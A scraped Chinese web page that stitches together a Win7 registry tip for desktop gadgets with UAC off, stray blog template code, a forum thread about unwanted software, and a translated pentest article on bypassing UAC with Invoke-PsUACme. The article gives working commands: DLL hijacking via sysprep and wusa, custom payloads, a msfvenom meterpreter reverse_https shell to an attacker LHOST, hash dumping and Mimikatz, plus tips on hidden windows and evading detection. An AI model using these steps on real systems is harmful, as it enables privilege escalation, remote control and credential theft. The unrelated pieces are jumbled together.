> 解决ghost win7系统UAC被关闭后无法使用小工具的方法
解决ghost win7系统UAC被关闭后无法使用小工具的方法
解决ghost win7系统UAC被关闭后无法使用小工具的方法
　　通常我们在装完Win7系统后，我们都会将UAC关闭起来。不过UAC若是被关闭了即无法使用桌面小工具。我们要怎么设置才能在关闭UAC后仍旧可以使用桌面小工具呢?
　　在注册表下修改数据表值，让我们可以继续使用桌面小工具，下面一起和小编来看看在Win7系统下的操作方法。
　　推荐系统下载：
　　一、先是按住键盘上的Win+R键，调出运行对话框，然后在运行对话框中输入regedit命令，打开注册表编辑器。
　　二、接着在注册表编辑器中，依次展开下面的分支HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ SidebarSettings，接着在SidebarSettings的右侧窗格中，右键单击空白处选择&新建&-&DWORD(32位值)&，再把新建的键值重命名为AllowElevatedProcess，然后双击打开它进入编辑窗口。在编辑窗口中录入1，点击确定按钮就可以了。
　　三、这时候再回出操作系统注册表编辑器，然后重新启动一下计算机就可以在桌面上打开桌面小工具。
------分隔线----------------------------
教程专题栏目
最新系统下载
最新系统教程
热门系统推荐
热门系统教程二次元同好交流新大陆
扫码下载App
汇聚2000万达人的兴趣社区下载即送20张免费照片冲印
扫码下载App
温馨提示！由于新浪微博认证机制调整，您的新浪微博帐号绑定已过期，请重新绑定！&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
阅读(384)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'Win10 系统下如何关闭UAC 又能正常使用Metro应用',
blogAbstract:'　　UAC用户帐户控制，在Win10系统中默认开启，很多时候运行软件的时候系统会弹出变暗确认框让用户确认是否执行，有些麻烦，所以有些用户选择了关闭。但是问题就出现了，关闭UAC之后，就不能正常开启Metro应用了，如何能做到双赢呢？\n\n\t　　\n\n\t　　Win8系统下关闭UAC又能正常使用Metro应用的方法：\n\n\t　　1、在win8系统中按下WIN键+R键 在弹出的运行框中输入 gpedit.msc 命令后回车；\n\n\t　　2、这时我们打开了策略组编辑器，在左侧的【计算机配置】下依次打开【Windows设置】—【安全设置】—【本地策略】—【安全选项】，如下图：\n\n\t　　',
blogTag:'windows',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:3,
publishTime:2,
permalink:'blog/static/',
commentCount:0,
mainCommentCount:0,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'',
hmcon:'0',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人：
{list a as x}
{if !!b&&b.length>0}
他们还推荐了：
{list b as y}
转载记录：
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}查看: 1866|回复: 17
今天莫名其妙的中了个电脑管家，小a防火墙联网控制设的询问，为啥防火墙和uac都没反应
本帖最后由 xuan1xuan 于
11:10 编辑
怪哉，不解，郁闷
按理说防火墙应该请求出站链接的，请问为啥没任何反应呢
UAC对特色是不会拦截，至于小A的防火墙，抱歉！我只用过免费版本= =
有HIPS的话，记得拉黑，没办法！即使是正常的程序，遇到推广就让它沉没了吧，强推没有好结果。
淡定&&我被装过N次了&&直接卸载即可
或许下载安装包的程序被你允许联网了，暗地里它干起了流氓的事。
也可能调用系统的神马进程
防火墙设置了信任具有数字签名的程序？或者放过系统文件？没用过小a的防火墙
红警修改器
我只认准 红警之家
淡定&&我被装过N次了&&直接卸载即可
报的是木马啊，电脑管家只是送品
这类流氓只有大数字才能顶得住
UAC对特色是不会拦截，至于小A的防火墙，抱歉！我只用过免费版本= =
有HIPS的话，记得拉黑，没办法！即使 ...
UAC开最高会不会有提示呢？表示没遇到过。
本帖最后由 呼啸风影 于
13:36 编辑
编辑掉，对小A不熟
Copyright & KaFan & All Rights Reserved.
Powered by Discuz! X3.1( 苏ICP备号 ) GMT+8,比特客户端
您的位置：
详解大数据
详解大数据
详解大数据
详解大数据
利用PowerShell绕过用户帐户控制（UAC）
　　背景介绍
　　UAC(User Account Control，用户帐户控制)是为提高系统安全而在Windows Vista中引入的新技术，它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前，提供权限或管理员‌密码。通过在这些操作启动前对其进行验证，UAC 可以帮助防止恶意软件和间谍软件在未经许可的情况下在计算机上进行安装或对计算机进行更改。
　　最近，在同Red团队接触的过程中，我通过客户端侧攻击获取到了一些用户机器的访问shell。在很多情况下，用户都拥有管理权限，但是我却陷入了非提权的PowerShell反向shell，此时UAC就是让人扫兴的地方。我讨厌UAC，因为它很烦人但还没处在安全边界。我曾阅读资料以及尝试绕过UAC，从中我知道绕过它其实是微不足道的。在本文中，我们将尝试各种方法和代码来绕过UAC。
　　UACME及使用方法
　　我们选择的用以绕过UAC的工具是UACME。这个优秀的工具实现了各种方法，并且值得庆幸的是它是开源的，为此感谢@hFirF0XAs。因为我总是尽量在后期利用阶段都使用PowerShell，所以我测试了UACME，并使用PowerShell实现了其中的一些方法。这里我给出Invoke-PsUACme.ps1文件，你可以在Nishang中的“Escalation(提权)”分类中找到它。
　　首先，我们以sysprep方法开始，它是绕过UAC最常用的方法，它在2009年由Leo Davidson而出名(详情)。它包括以下步骤：
　　1、复制并在目录C:\Windows\System32\sysprep中植入一个DLL。DLL的名称取决于Windows版本。
　　(1)上为CRYPTBASE.dll。
　　(2)上为shcore.dll。
　　2、从上述目录中执行sysprep.exe。它将加载上述DLL并以特殊权限执行它。
　　事实上，所有的UAC绕过方法包括加载DLL和可执行的名称和位置。见下表：
　　测试过的构建版本：
　　Windows 7 build 6.1.
　　Windows 8.1 build 6.3.9600.0
　　Windows 10 build 10.0.10240.0
　　现在，将DLL复制到 sysprep目录，我们需要进行权限提升。实现这一目的的两种最流行的方式是：使用一个IFileOperation COM对象，或者使用Wusa.exe和它的“extract”选项。目前，Invoke-PsUACme使用的是Wusa方法。因为Wusa设置为了自动提升，所以我们可以用它来提取一个cab文件到sysprep目录。可以通过使用makecab工具创建一个cab文件：
　　C:\& makecab C:\uac\evil.dll C:\uac\uac.cab
　　上面的命令只是为了解释Invoke-PsUACme到底做了什么，我们并不需要手动运行这些命令。
　　现在，Invoke-PsUACme使用的DLL来自于UACME项目，并做了一个小小的改变。并非运行cmd.exe，而是我们告诉DLL从C:\Windows\Temp执行cmd.bat。这个cmd.bat中包含了我们将在目标机器上执行的payload。在执行复杂攻击时，这一点将给我们提供很大的灵活性。
　　上面的DLL(64位和32位)被硬编码在了DLLBytes64和DLLBytes32变量中的脚本中。这个脚本能够确定进程的bit-ness，而它就是从这里被调用的，并且使用apt DLL。说到更有趣的部分时，Invoke-PsUACme可以这样使用：
　　PS C:\& Invoke-PsUACme -method sysprep
　　很好，我们能够绕过UAC了。默认的payload仅仅检查绕过是否是成功的。注意，在cmd.bat文件中将-noexit参数传递给了PowerShell中，这样我们就可以看到输出了。
　　自定义Payload
　　我们还可以一直使用自定义payload：
　　PS C:\& Invoke-PsUACme -method oobe -Payload "powershell -noexit -c Get-Process"
　　请注意，我们还需要指定powershell.exe。无论为Paylaod参数指定了什么，它都会在C:\Windows\Temp\cmd.bat中结束。在DLL中改变批处理文件的路径之后，你也可以使用PayloadPath参数改变它。
　　后文中我们将再次讲解Payload参数的更多实际应用。
　　自定义DLL
　　为了使用一个自定义DLL，我们可以使用CustomDLL64和CustomDLL32参数。例如，可以使用UACME中原始的64位Fubuki DLL，并利用Invoke-PsUACme来使用它：
　　PS C:\& Invoke-PSUACMe -CustomDll64 C:\test\Fubuki64.dll -CustomDll32
　　我们也可以向DLLBytes64和DLLBytes32参数提供一个DLL的字节数组。
　　使用方法
　　现在，让我们再现本文开头中的场景，我们有几个未提权的反向PowerShell shell，我们可以使用Invoke-PsUACme来以高权限执行命令和脚本。接下来，我们使用Nishang的反向TCP(reverse TCP one liner)，并使用Invoke-Encode编码它，然后通过Invoke-PsUACme来使用它：
　　很酷吧，我们成功地绕过了UAC，并提升了我们的权限。为了验证这一点，我们从Powerpreter运行Get-PassHashes。一旦成功进行了权限提升，通过使用Nishang/Powerpreter的Enable-DuplicateToken，我们总是可以将权限提升为SYSTEM。
　　事实上，在提升为SYSTEM权限后，我们也可以使用Powersploit中的Invoke-Mimikatz来用于域tokens。
　　在上面的例子中，如果你不能从上pull到脚本，那么可以使用Invoke-Encode将它们编码为压缩的base64类型，并能够以powershell.exe中的编码指令(-e或-encodecommand)参数使用。也许，你可能喜欢使用PowerShell中的“-WindowStyle hidden”参数来避免向用户显示任何弹窗。
　　虽然metasploit对于UAC绕过有它自己的实现方法，且我们可以利用提升的权限得到一个meterpreter，但利用前面的方法可以有无限的机会。此外，在PowerShell中，我们可以使用msfvenom来生成一个meterpreter：
　　./msfvenom -p windows/x64/meterpreter/reverse_https LHOST = 192.168.230.154 -f psh-reflection
　　我已经多次强调，对于Windows网络的渗透测试来说PowerShell是多么的有用。例如，在最初进行客户端侧攻击时，我们可以使用Invoke-PsUACme作为一个有效载荷(paylaod)。接下来，我们使用Nishang的Invoke-PsUACme和Out-Word。我们从Invoke-PsUACme脚本本身来进行函数调用，以此避免不必要的复杂命令。
　　搞定，此时就得到了一个提权的交互式反向PowerShell shell。
　　正如你所看到的，在PowerShell中实现现有技术是非常有益的，它不仅增加了对PowerShell的理解，还提高了使用PowerShell的技术。
　　限制性
　　因为Invoke-PsUACme基于UACME项目，而它所实现的技术会被恶意软件所使用，因此有可能它所使用的DLL在以后会被检测到。当这种问题出现时，根据以往的记录，对DLL的源码进行小小的修改应该能够解决这个问题。
　　此外，因为Wusa.exe在Windows 10上没有“extract”选项，所以目前Invoke-PsUACme在Windows 10上无法工作。因此，请自由实现IFileOperation或任何其他方法。
相关文章：
[ 责任编辑：小石潭记 ]
新经济、新业态环境下，数据量呈…
甲骨文的云战略已经完成第一阶段…
软件信息化周刊
比特软件信息化周刊提供以数据库、操作系统和管理软件为重点的全面软件信息化产业热点、应用方案推荐、实用技巧分享等。以最新的软件资讯，最新的软件技巧，最新的软件与服务业内动态来为IT用户找到软捷径。
商务办公周刊
比特商务周刊是一个及行业资讯、深度分析、企业导购等为一体的综合性周刊。其中，与中国计量科学研究院合力打造的比特实验室可以为商业用户提供最权威的采购指南。是企业用户不可缺少的智选周刊！
比特网络周刊向企业网管员以及网络技术和产品使用者提供关于网络产业动态、技术热点、组网、建网、网络管理、网络运维等最新技术和实用技巧，帮助网管答疑解惑，成为网管好帮手。
服务器周刊
比特服务器周刊作为比特网的重点频道之一，主要关注x86服务器，RISC架构服务器以及高性能计算机行业的产品及发展动态。通过最独到的编辑观点和业界动态分析，让您第一时间了解服务器行业的趋势。
比特存储周刊长期以来，为读者提供企业存储领域高质量的原创内容，及时、全面的资讯、技术、方案以及案例文章，力求成为业界领先的存储媒体。比特存储周刊始终致力于用户的企业信息化建设、存储业务、数据保护与容灾构建以及数据管理部署等方面服务。
比特安全周刊通过专业的信息安全内容建设，为企业级用户打造最具商业价值的信息沟通平台，并为安全厂商提供多层面、多维度的媒体宣传手段。与其他同类网站信息安全内容相比，比特安全周刊运作模式更加独立，对信息安全界的动态新闻更新更快。
新闻中心热点推荐
新闻中心以独特视角精选一周内最具影响力的行业重大事件或圈内精彩故事，为企业级用户打造重点突出，可读性强，商业价值高的信息共享平台；同时为互联网、IT业界及通信厂商提供一条精准快捷，渗透力强，覆盖面广的媒体传播途径。
云计算周刊
比特云计算周刊关注云计算产业热点技术应用与趋势发展，全方位报道云计算领域最新动态。为用户与企业架设起沟通交流平台。包括IaaS、PaaS、SaaS各种不同的服务类型以及相关的安全与管理内容介绍。
CIO俱乐部周刊
比特CIO俱乐部周刊以大量高端CIO沙龙或专题研讨会以及对明星CIO的深入采访为依托，汇聚中国500强CIO的集体智慧。旨为中国杰出的CIO提供一个良好的互融互通 、促进交流的平台，并持续提供丰富的资讯和服务，探讨信息化建设，推动中国信息化发展引领CIO未来职业发展。
IT专家新闻邮件长期以来，以定向、分众、整合的商业模式，为企业IT专业人士以及IT系统采购决策者提供高质量的原创内容，包括IT新闻、评论、专家答疑、技巧和白皮书。此外，IT专家网还为读者提供包括咨询、社区、论坛、线下会议、读者沙龙等多种服务。
X周刊是一份IT人的技术娱乐周刊，给用户实时传递I最新T资讯、IT段子、技术技巧、畅销书籍，同时用户还能参与我们推荐的互动游戏，给广大的IT技术人士忙碌工作之余带来轻松休闲一刻。
微信扫一扫
关注Chinabyte}